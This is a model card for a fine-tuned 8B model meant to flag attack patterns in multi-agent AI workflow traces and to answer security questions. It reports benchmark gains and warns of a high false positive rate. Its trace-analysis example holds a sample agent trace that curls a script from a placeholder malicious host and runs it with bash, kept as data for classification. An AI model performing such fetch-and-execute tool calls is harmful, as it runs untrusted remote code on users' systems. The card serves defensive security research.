---
license: apache-2.0
base_model: fdtn-ai/Foundation-Sec-8B-Instruct
tags:
- cybersecurity
- agentic-ai-security
- security
- llm-security
- owasp
- qlora
- fine-tuned
- trace-analysis
- multi-agent-security
- opentelemetry
model-index:
- name: Foundation-Sec-8B-Agentic-V4
  results:
  - task:
      type: question-answering
      name: Custom Cybersecurity MCQA
    metrics:
    - type: accuracy
      value: 74.29
      name: Overall Accuracy
      verified: true
    - type: accuracy
      value: 70.0
      name: Agentic AI Security
      verified: true
---

# agentic-safety-gguf

![License](https://img.shields.io/badge/License-Apache%202.0-green)
![Model Size](https://img.shields.io/badge/Model-8B%20params-orange)
![Training](https://img.shields.io/badge/Training-QLoRA-purple)

**Research Paper:**(https://arxiv.org/abs/2601.00848)

**Specialized security model for detecting temporal attack patterns in multi-agent AI workflows.**

Fine-tuned from Foundation-Sec-8B-Instruct (Llama 3.1 8B) on 80,851 curated examples + 141 targeted augmentation examples, achieving **74.29% accuracy** on custom cybersecurity benchmarks—a **+31.43-point improvement** over base model (p < 0.001).

## 🎯 Key Capabilities

✅ **Temporal Attack Pattern Detection**: Identifies malicious sequences across multi-step agent workflows  
✅ **OpenTelemetry Trace Analysis**: Classifies workflow traces for OWASP Top 10 Agentic vulnerabilities  
✅ **Security Knowledge Q&A**: Answers technical questions about agentic AI security, LLM threats, MITRE ATT&CK  
✅ **Multi-Agent Security**: Detects coordination attacks in distributed agent systems

## ⚠️ Critical Production Warning

**NOT production-ready for automated security decisions:**

- **False Positive Rate**: 66.7% on benign workflow traces
- **Trace Accuracy**: 30% overall (60% TPR, 0% TNR)
- **Root Cause**: Training data heavily skewed toward attacks (90% malicious)
- **Deployment**: **Human-in-the-loop oversight mandatory** - suitable for monitoring/alerting only, not automated blocking

See research paper for detailed analysis and proposed V5 improvements.

## 📊 Performance Summary

| Benchmark | Base Model | agentic-safety-gguf | Improvement |
|-----------|------------|---------------------|-------------|
| **Custom MCQA Overall** | 42.86% | **74.29%** | **+31.43 pts** |
| Agentic AI Security | 40.0% | **70.0%** | +30.0 pts |
| Traditional Security | 44.0% | **76.0%** | +32.0 pts |
| MMLU Computer Security | - | **74.0%** | - |
| MMLU Security Studies | - | **72.24%** | - |

**Statistical Validation**: McNemar's χ² = 18.05, p < 0.001, Cohen's h = 0.65 (large effect)

**Iterative Training**: V2 baseline (80,851 ex) → V3 (+111 OWASP) → V4 (+30 adversarial) demonstrated targeted augmentation effectiveness.

## 🚀 Quick Start

```python
from transformers import AutoModelForCausalLM, AutoTokenizer
import torch

# Load model
model_name = "guerilla7/agentic-safety-gguf"
tokenizer = AutoTokenizer.from_pretrained(model_name)
model = AutoModelForCausalLM.from_pretrained(
    model_name,
    torch_dtype=torch.bfloat16,
    device_map="auto"
)

# Security Q&A
messages = [
    {"role": "system", "content": "You are a cybersecurity expert specialized in agentic workflow security."},
    {"role": "user", "content": "What is indirect prompt injection in multi-agent systems?"}
]

inputs = tokenizer.apply_chat_template(messages, return_tensors="pt").to(model.device)
outputs = model.generate(inputs, max_new_tokens=512, temperature=0.7, do_sample=True)
response = tokenizer.decode(outputs[0], skip_special_tokens=True)
print(response)
```

### Analyzing Workflow Traces

```python
import json

trace = {
    "spans": [
        {"name": "user_request", "attributes": {"action": "fetch_emails"}},
        {"name": "tool_call", "attributes": {"tool": "curl", "url": "https://malicious.com/script.sh"}},
        {"name": "tool_call", "attributes": {"tool": "bash", "command": "script.sh"}}
    ]
}

prompt = f"""Analyze this trace for security threats:
{json.dumps(trace, indent=2)}
Classify as BENIGN, SUSPICIOUS, or MALICIOUS."""

# Use model as above with prompt
```

**⚠️ Warning**: 66.7% FPR requires human review before taking action.

## 📖 Use Cases

### ✅ Recommended
- Security research on agentic AI vulnerabilities
- Educational demonstrations (OWASP Top 10)
- Prototype development for security tools
- Knowledge assistance (74% MCQA accuracy)

### ❌ Not Recommended
- Production security monitoring without human oversight
- Automated security decisions (30% trace accuracy insufficient)
- Mission-critical applications
- Regulatory compliance automation

## 🎓 Training Details

**Dataset**: 80,851 curated examples from 18 cybersecurity sources + 35,026 synthetic OpenTelemetry traces, augmented with 111 OWASP-focused + 30 adversarial examples via continuation training

**Complete dataset**: [guerilla7/agentic-safety-gguf](https://huggingface.co/datasets/guerilla7/agentic-safety-gguf)

**Method**: QLoRA (4-bit NF4, rank 16, alpha 16)  
**Hardware**: NVIDIA DGX Spark (ARM64, 128GB)  
**Training**: V2 (1,500 steps, 6h 43m) → V3 (+500 steps) → V4 (+500 steps)  
**Loss**: 3.68 → 0.52 (85.99% reduction)

See research paper for the complete methodology, ablation studies, and statistical analysis.

## 📚 Resources

- **Dataset Repository**: [datasets/guerilla7/agentic-safety-gguf](https://huggingface.co/datasets/guerilla7/agentic-safety-gguf)
- **Research Paper**: (https://arxiv.org/abs/2601.00848)
- **Training Scripts**: Complete QLoRA implementation, evaluation code, GGUF quantization utilities

## 📄 Citation

```bibtex
@article{agentic-safety-gguf-2025,
  title={agentic-safety-gguf: Specialized Fine-Tuning for Agentic AI Security},
  year={2025},
  url={https://huggingface.co/guerilla7/agentic-safety-gguf}
}
```

## ⚖️ Limitations

1. **High False Positive Rate (66.7%)**: Unsuitable for production without human oversight
2. **Small Evaluation Sample**: 30 trace evaluation (±18% confidence intervals)
3. **Synthetic Data Bias**: 43% synthetic training data
4. **ARM64-Specific**: Training validated on DGX Spark only
5. **No Commercial Comparison**: Not benchmarked against GPT-4/Claude

**Proposed V5 Solution**: Balanced dataset (80K benign + 80K malicious) targeting 30-50% FPR, 75-85% TPR. See paper for detailed roadmap.

## 📅 Updates

- **2025-12-29**: Initial release with V2/V3/V4 training artifacts and research paper

## License

Apache 2.0